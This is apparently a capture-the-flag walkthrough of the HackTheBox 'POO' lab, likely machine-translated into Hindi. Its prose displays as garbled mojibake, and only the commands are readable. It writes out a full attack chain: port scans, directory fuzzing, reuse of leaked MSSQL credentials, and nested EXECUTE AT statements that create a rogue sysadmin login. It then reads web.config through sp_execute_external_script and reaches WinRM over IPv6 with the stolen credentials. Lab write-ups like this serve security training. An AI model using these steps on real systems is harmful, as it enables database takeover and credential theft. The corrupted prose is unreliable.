Get best of the week

HackTheBox рдПрдВрдбрдЧреЗрдоред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдХреНрд░рд╛рдордХ рд╕рдВрдЪрд╛рд▓рди рдкрд╛рд╕ рдХрд░реЗрдВред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЫрд╡рд┐

рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ, рд╣рдо рдХреЗрд╡рд▓ рдПрдХ рдХрд╛рд░ рдХреЗ рдирд╣реАрдВ рдмрд▓реНрдХрд┐ HackTheBox рд╕рд╛рдЗрдЯ рд╕реЗ рдПрдХ рд╕рдВрдкреВрд░реНрдг рдорд┐рдиреА-рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдХреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВрдЧреЗ ред

рдЬреИрд╕рд╛ рдХрд┐ рд╡рд┐рд╡рд░рдг рдореЗрдВ рдХрд╣рд╛ рдЧрдпрд╛ рд╣реИ, POO рдХреЛ рдЫреЛрдЯреЗ рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рд╣рдорд▓реЛрдВ рдХреЗ рд╕рднреА рдЪрд░рдгреЛрдВ рдореЗрдВ рдХреМрд╢рд▓ рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рд▓рдХреНрд╖реНрдп рдЙрдкрд▓рдмреНрдз рд╣реЛрд╕реНрдЯ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдирд╛ рд╣реИ, рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдирд╛ рд╣реИ рдФрд░ рдЕрдВрддрддрдГ 5 рдЭрдВрдбреЗ рдПрдХрддреНрд░ рдХрд░рддреЗ рд╣реБрдП рдкреВрд░реЗ рдбреЛрдореЗрди рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдирд╛ рд╣реИред

рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдХрд╛ рдХрдиреЗрдХреНрд╢рди рд╡реАрдкреАрдПрди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реИред рдпрд╣ рд╕рд▓рд╛рд╣ рджреА рдЬрд╛рддреА рд╣реИ рдХрд┐ рдПрдХ рдХрд╛рд░реНрдп рдХрдВрдкреНрдпреВрдЯрд░ рдпрд╛ рдПрдХ рд╣реЛрд╕реНрдЯ рд╕реЗ рдХрдиреЗрдХреНрдЯ рди рдХрд░реЗрдВ рдЬрд╣рд╛рдВ рдЖрдкрдХреЗ рд▓рд┐рдП рдорд╣рддреНрд╡рдкреВрд░реНрдг рдбреЗрдЯрд╛ рдЙрдкрд▓рдмреНрдз рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдЖрдк рдПрдХ рдирд┐рдЬреА рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд╕рд╛рде рд╣реИрдВ рдЬреЛ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХреБрдЫ рдЬрд╛рдирддреЗ рд╣реИрдВ :)

рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЬрд╛рдирдХрд╛рд░реА
, , Telegram . , , .

. , - , .

рдкрд╣рдЪрд╛рди


рдЗрд╕ рдПрдВрдбрдЧреЗрдо рдореЗрдВ рджреЛ рдорд╢реАрдиреЗрдВ рд╣реЛрддреА рд╣реИрдВ, рдФрд░ 5 рдЭрдВрдбреЗ рд╣реЛрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЙрдкрд▓рдмреНрдз рд╣реЛрд╕реНрдЯ рдХрд╛ рд╡рд┐рд╡рд░рдг рдФрд░ рдкрддрд╛ рднреА рджрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

рдЫрд╡рд┐

рдЖрдПрдБ рд╢реБрд░реВ рдХрд░реЗрдВ!

рдЭрдВрдбрд╛ рдлрд╣рд░рд╛рдУ


рдЗрд╕ рдорд╢реАрди рдХрд╛ рдЖрдИрдкреА рдПрдбреНрд░реЗрд╕ 10.13.38.11 рд╣реИ, рдЬрд┐рд╕реЗ рдореИрдВ / etc / рдореЗрдЬрдмрд╛рдиреЛрдВ рдореЗрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реВрдБред
10.13.38.11 poo.htb

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рд╣рдо рдЦреБрд▓реЗ рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рддреЗ рд╣реИрдВред рдЪреВрдВрдХрд┐ рдиреИрдореНрдк рдХреЗ рд╕рд╛рде рд╕рднреА рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд▓рдВрдмрд╛ рд╕рдордп рд▓рдЧрддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдореИрдВ рдЗрд╕реЗ рдкрд╣рд▓реЗ рдореИрд╕рдХреИрди рдХреЗ рд╕рд╛рде рдХрд░реВрдВрдЧрд╛ред рд╣рдо рдкреНрд░рддрд┐ рд╕реЗрдХрдВрдб 500 рдкреИрдХреЗрдЯ рдХреА рдЧрддрд┐ рд╕реЗ tun0 рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рд╕реЗ рд╕рднреА рдЯреАрд╕реАрдкреА рдФрд░ рдпреВрдбреАрдкреА рдкреЛрд░реНрдЯ рдХреЛ рд╕реНрдХреИрди рдХрд░рддреЗ рд╣реИрдВред

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

рдЫрд╡рд┐

рдЕрдм, рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдкрд░ рдХрд╛рдо рдХрд░рдиреЗ рд╡рд╛рд▓реА рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП, рд╣рдо -рдП рд╡рд┐рдХрд▓реНрдк рдХреЗ рд╕рд╛рде рдПрдХ рд╕реНрдХреИрди рдЪрд▓рд╛рдПрдВрдЧреЗред

nmap -A poo.htb -p80,1433

рдЫрд╡рд┐

рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ IIS рдФрд░ MSSQL рд╣реИред рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рд╣рдо рдбреЛрдореЗрди рдФрд░ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рд╡рд╛рд╕реНрддрд╡рд┐рдХ DNS рдирд╛рдо рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдПрдВрдЧреЗред рд╡реЗрдм рд╕рд░реНрд╡рд░ рдкрд░ рд╣рдореЗрдВ IIS рд╣реЛрдордкреЗрдЬ рджреНрд╡рд╛рд░рд╛ рдмрдзрд╛рдИ рджреА рдЬрд╛рддреА рд╣реИред

рдЫрд╡рд┐

рдЪрд▓реЛ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЪрд▓рддреЗ рд╣реИрдВред рдореИрдВ рдЗрд╕рдХреЗ рд▓рд┐рдП рдЧреЛрдмрд╕реНрдЯрд░ рдХрд╛ рдЗрд╕реНрддреЗрдорд╛рд▓ рдХрд░рддрд╛ рд╣реВрдВред рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ рд╣рдо рдзрд╛рд░рд╛рдУрдВ рдХреА рд╕рдВрдЦреНрдпрд╛ 128 (-t), URL (-u), рд╢рдмреНрджрдХреЛрд╢ (-w) рдФрд░ рдПрдХреНрд╕рдЯреЗрдВрд╢рди рдЬреЛ рд╣рдореЗрдВ (-x) рдмреНрдпрд╛рдЬ рджреЗрддреЗ рд╣реИрдВ, рдЗрдВрдЧрд┐рдд рдХрд░рддреЗ рд╣реИрдВред

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

рдЫрд╡рд┐

рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ / рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЗ рд▓рд┐рдП HTTP рдкреНрд░рдорд╛рдгреАрдХрд░рдг, рд╕рд╛рде рд╣реА рдПрдХ рдЙрдкрд▓рдмреНрдз рдбреЗрд╕реНрдХрдЯреЙрдк рд╕реЗрд╡рд╛ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдлрд╝рд╛рдЗрд▓ .DS_Store рд╣реИред .DS_Store - рдпреЗ рдлрд╛рдЗрд▓реЗрдВ рд╣реИрдВ рдЬреЛ рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЛ рд╕реНрдЯреЛрд░ рдХрд░рддреА рд╣реИрдВ, рдЬреИрд╕реЗ рдХрд┐ рдлрд╛рдЗрд▓реЛрдВ рдХреА рд╕реВрдЪреА, рдЖрдЗрдХрди рдХрд╛ рд╕реНрдерд╛рди, рдЪрдпрдирд┐рдд рдкреГрд╖реНрдарднреВрдорд┐ рдЫрд╡рд┐ред рдРрд╕реА рдлрд╝рд╛рдЗрд▓ рд╡реЗрдм рдбреЗрд╡рд▓рдкрд░реНрд╕ рдХреА рд╡реЗрдм рд╕рд░реНрд╡рд░ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдЧрд┐рд░ рд╕рдХрддреА рд╣реИред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдореЗрдВ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдорд┐рд▓рддреА рд╣реИред рдЖрдк рдЗрд╕рдХреЗ рд▓рд┐рдП DS_Store рдХреНрд░реЙрд▓рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ ред

python3 dsstore_crawler.py -i http://poo.htb/

рдЫрд╡рд┐

рд╣рдореЗрдВ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреА рд╕рд╛рдордЧреНрд░реА рдорд┐рд▓рддреА рд╣реИред рдпрд╣рд╛рдВ рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рдмрд╛рдд рд╣реИ / рджреЗрд╡ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛, рдЬрд┐рд╕рдореЗрдВ рд╕реЗ рд╣рдо рджреЛ рд╢рд╛рдЦрд╛рдУрдВ рдореЗрдВ рд╕реНрд░реЛрдд рдФрд░ рдбреАрдмреА рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рд▓реЗрдХрд┐рди рд╣рдо рдлрд╛рдЗрд▓реНрд╕ рдФрд░ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдЬрд╝ рдХреЗ рдирд╛рдо рдХреЗ рдкрд╣рд▓реЗ 6 рдЕрдХреНрд╖рд░ рд░рдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдЕрдЧрд░ рдпрд╣ рд╕реЗрд╡рд╛ IIS рд╢реЙрд░реНрдЯрдиреЗрдо рдХреА рдЪрдкреЗрдЯ рдореЗрдВ рд╣реИред рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, IIS рд╢реЙрд░реНрдЯрдирд╛рдо рд╕реНрдХреИрдирд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ ред

рдЫрд╡рд┐

рдФрд░ рд╣рдо рдПрдХ рдкрд╛рда рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЬрд╛рддреЗ рд╣реИрдВ рдЬреЛ "poo_co" рд╕реЗ рд╢реБрд░реВ рд╣реЛрддреА рд╣реИред рдЖрдЧреЗ рдХреНрдпрд╛ рдХрд░рдирд╛ рд╣реИ, рдпрд╣ рдирд╣реАрдВ рдЬрд╛рдирддреЗ рд╣реБрдП, рдореИрдВрдиреЗ рд╕реАрдзреЗ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╢рдмреНрджрдХреЛрд╢ рд╕реЗ "рд╕рд╣" рд╕реЗ рд╢реБрд░реВ рд╣реЛрдиреЗ рд╡рд╛рд▓реЗ рд╕рднреА рд╢рдмреНрджреЛрдВ рдХрд╛ рдЪрдпрди рдХрд┐рдпрд╛ред

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

рдФрд░ wfuzz рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкреБрдирд░рд╛рд╡реГрддрд┐ред

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

рдЫрд╡рд┐

рдФрд░ рд╣рдо рд╕рд╣реА рд╢рдмреНрдж рдвреВрдВрдврддреЗ рд╣реИрдВ! рд╣рдо рдЗрд╕ рдлрд╛рдЗрд▓ рдХреЛ рджреЗрдЦрддреЗ рд╣реИрдВ, рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ (рдбреАрдмреАрдПрдирдПрдПрдордИ рдкреИрд░рд╛рдореАрдЯрд░ рджреНрд╡рд╛рд░рд╛ рдирд┐рд░реНрдгрдп рд▓реЗрддреЗ рд╣реИрдВ, рд╡реЗ MSSQL рд╕реЗ рд╣реИрдВ) рдХреЛ рдмрдЪрд╛рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рд╣рдо рдзреНрд╡рдЬ рд╕реМрдВрдкрддреЗ рд╣реИрдВ, рдФрд░ рд╣рдо 20% рд╕реЗ рдЖрдЧреЗ рдмрдврд╝ рд░рд╣реЗ рд╣реИрдВред

рдЫрд╡рд┐

рд╣реБрд╣ рдЭрдВрдбрд╛


рд╣рдо MSSQL рд╕реЗ рдЬреБрдбрд╝реЗ рд╣реИрдВ, рдореИрдВ DBeaver рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реВрдВред

рдЫрд╡рд┐

рд╣рдо рдЗрд╕ рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ рдХреБрдЫ рднреА рджрд┐рд▓рдЪрд╕реНрдк рдирд╣реАрдВ рдкрд╛рддреЗ рд╣реИрдВ, рдЪрд▓реЛ рдПрдХ SQL рд╕рдВрдкрд╛рджрдХ рдмрдирд╛рдПрдБ рдФрд░ рджреЗрдЦреЗрдВ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрдпрд╛ рд╣реИрдВред

SELECT name FROM master..syslogins;

рдЫрд╡рд┐

рд╣рдорд╛рд░реЗ рджреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИрдВред рдЖрдЗрдП рд╣рдорд╛рд░реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рджреЗрдЦреЗрдВред

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

рдЫрд╡рд┐

рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдХреЛрдИ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдирд╣реАрдВ рд╣реИрдВред рдЖрдЗрдП рд╕рдВрдмрдВрдзрд┐рдд рд╕рд░реНрд╡рд░ рджреЗрдЦреЗрдВ, рдЗрд╕ рддрдХрдиреАрдХ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдореИрдВрдиреЗ рдпрд╣рд╛рдВ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рд▓рд┐рдЦрд╛ рд╣реИ ред

SELECT * FROM master..sysservers;

рдЫрд╡рд┐

рддреЛ рд╣рдореЗрдВ рдПрдХ рдФрд░ SQL Server рдорд┐рд▓ рдЬрд╛рддрд╛ рд╣реИред рдЖрдЗрдП рдЗрд╕ рд╕рд░реНрд╡рд░ рдкрд░ рдУрдкрдирдХреНрд╡реЗрд░реА () рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХрдорд╛рдВрдб рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред

SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'select @@version as version');

рдЫрд╡рд┐

рдФрд░ рд╣рдо рдПрдХ рдХреНрд╡реЗрд░реА рдЯреНрд░реА рднреА рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВред

SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITY\POO_PUBLIC", ''select @@version as version'');');

рддрдереНрдп рдпрд╣ рд╣реИ рдХрд┐ рдЬрдм рд╣рдо рдХрд┐рд╕реА рд▓рд┐рдВрдХ рдХрд┐рдП рдЧрдП рд╕рд░реНрд╡рд░ рдХреЗ рдЕрдиреБрд░реЛрдз рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдЕрдиреБрд░реЛрдз рдХреЛ рдХрд┐рд╕реА рдЕрдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╕рдВрджрд░реНрдн рдореЗрдВ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ! рдЖрдЗрдП рджреЗрдЦреЗрдВ рдХрд┐ рд╣рдо рдХрд┐рд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗ рдЬреБрдбрд╝реЗ рд╕рд░реНрд╡рд░ рдкрд░ рдХрд╛рдо рдХрд░ рд░рд╣реЗ рд╣реИрдВред

SELECT name FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT user_name() as name');

рдЫрд╡рд┐

рдЕрдм рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рд╣рдорд╛рд░реЗ рд╕реЗ рдЬреБрдбрд╝реЗ рд╕рд░реНрд╡рд░ рд╕реЗ рдЕрдиреБрд░реЛрдз рдХрд┐рд╕ рд╕рдВрджрд░реНрдн рдореЗрдВ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддрд╛ рд╣реИ!

SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT user_name() as name'');');

рдЫрд╡рд┐

рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдпрд╣ рдПрдХ рдбреАрдмреАрдУ рд╕рдВрджрд░реНрдн рд╣реИ рдЬрд┐рд╕рдореЗрдВ рд╕рднреА рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реЛрдиреЗ рдЪрд╛рд╣рд┐рдПред рдХрд┐рд╕реА рд▓рд┐рдВрдХ рдХрд┐рдП рдЧрдП рд╕рд░реНрд╡рд░ рд╕реЗ рдЕрдиреБрд░реЛрдз рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред

SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

рдЫрд╡рд┐

рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╕рднреА рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ! рдЖрдЗрдП рдЗрд╕ рддрд░рд╣ рд╕реЗ рдЕрдкрдирд╛ рдПрдбрдорд┐рди рдмрдирд╛рдПрдВред рд▓реЗрдХрд┐рди рд╡реЗ рдЗрд╕реЗ рдУрдкрдирдХреНрд╡реЗрд░реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдирд╣реАрдВ рдХрд░рддреЗ рд╣реИрдВ, рдЪрд▓реЛ рдЗрд╕реЗ EXECUTE AT рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд░рддреЗ рд╣реИрдВред

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";

рдФрд░ рдЕрдм рд╣рдо рдирдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде рдЬреБрдбрд╝реЗ рд╣реБрдП рд╣реИрдВ, рд╣рдо рдирдП рдзреНрд╡рдЬ рдбреЗрдЯрд╛рдмреЗрд╕ рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдХрд░рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рд╣рдо рдЗрд╕ рдзреНрд╡рдЬ рдХреЛ рд╕реМрдВрдкрддреЗ рд╣реИрдВ рдФрд░ рдЖрдЧреЗ рдмрдврд╝рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдкреАрдЫреЗ рдХрд╛ рдЭрдВрдбрд╛


рд╣рдо MSSQL рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВрдЧреЗ, рдореИрдВ impacket рдкреИрдХреЗрдЬ рд╕реЗ mssqlclient рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реВрдВред

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

рдЫрд╡рд┐

рд╣рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рдФрд░ рдкрд╣рд▓реА рдЪреАрдЬ рдЬреЛ рд╣рдо рдкрд╣рд▓реЗ рд╣реА рдорд┐рд▓ рдЪреБрдХреЗ рд╣реИрдВ рд╡рд╣ рд╣реИ рд╕рд╛рдЗрдЯред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдореЗрдВ рдПрдХ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ (рд╕реБрд╡рд┐рдзрд╛рдЬрдирдХ рд╢реЗрд▓ рдХреЛ рдлреЗрдВрдХрдирд╛ рдЕрд╕рдВрднрд╡ рд╣реИ, рдЬрд╛рд╣рд┐рд░рд╛ рддреМрд░ рдкрд░ рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХрд╛рдо рдХрд░ рд░рд╣рд╛ рд╣реИ)ред

рдЫрд╡рд┐

рд▓реЗрдХрд┐рди рдкрд╣реБрдВрдЪ рд╕реЗ рд╡рдВрдЪрд┐рдд рд╣реИред рд╣рд╛рд▓рд╛рдБрдХрд┐ рд╣рдо MSSQL рд╕реЗ рдлрд╛рдЗрд▓ рдкрдврд╝ рд╕рдХрддреЗ рд╣реИрдВ, рдЖрдкрдХреЛ рдХреЗрд╡рд▓ рдпрд╣ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рдкреНрд░реЛрдЧреНрд░рд╛рдорд┐рдВрдЧ рд▓реИрдВрдЧреНрд╡реЗрдЬ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХреА рдЧрдИ рд╣реИрдВред рдФрд░ MSSQL рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рд╣рдореЗрдВ рдкрддрд╛ рдЪрд▓рддрд╛ рд╣реИ рдХрд┐ рдкрд╛рдпрдерди рдХреНрдпрд╛ рд╣реИред

рдЫрд╡рд┐

рдлрд┐рд░ web.config рдлрд╝рд╛рдЗрд▓ рдкрдврд╝реЗрдВ рдХреЛрдИ рд╕рдорд╕реНрдпрд╛ рдирд╣реАрдВ рд╣реИред

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:\inetpub\wwwroot\web.config').read())"

рдЫрд╡рд┐

рдкрд╛рдП рдЧрдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде, / рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд░ рдЬрд╛рдПрдВ рдФрд░ рдзреНрд╡рдЬ рдЙрдард╛рдПрдВред

рдЫрд╡рд┐

рдЫрд╡рд┐

рдЪрд┐рдХрдирд╛ рдЭрдВрдбрд╛


рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рд╕реЗ рдХреБрдЫ рдЕрд╕реБрд╡рд┐рдзрд╛рдПрдБ рд╣реЛрддреА рд╣реИрдВ, рд▓реЗрдХрд┐рди рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЛ рджреЗрдЦрддреЗ рд╣реБрдП, рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ IPv6 рдкрдВрдЪрд░ рдХрд╛ рднреА рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ!

рдЫрд╡рд┐

рдЗрд╕ рдкрддреЗ рдХреЛ / etc / рдореЗрдЬрдмрд╛рди рдореЗрдВ рдЬреЛрдбрд╝реЗрдВред
dead:babe::1001 poo6.htb
рдЖрдЗрдП рдореЗрдЬрдмрд╛рди рдХреЛ рдлрд┐рд░ рд╕реЗ рд╕реНрдХреИрди рдХрд░реЗрдВ, рд▓реЗрдХрд┐рди рдЖрдИрдкреАрд╡реА 6 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗред

рдЫрд╡рд┐

рдФрд░ IPv6 рдкрд░, WinRM рд╕реЗрд╡рд╛ рдЙрдкрд▓рдмреНрдз рд╣реИред рдкрд╛рдпрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде рдХрдиреЗрдХреНрдЯ рдХрд░реЗрдВред

рдЫрд╡рд┐

рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдПрдХ рдЭрдВрдбрд╛ рд╣реИ, рд╣рдо рдЗрд╕реЗ рд╕реМрдВрдк рджреЗрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

P00ed рдЭрдВрдбрд╛


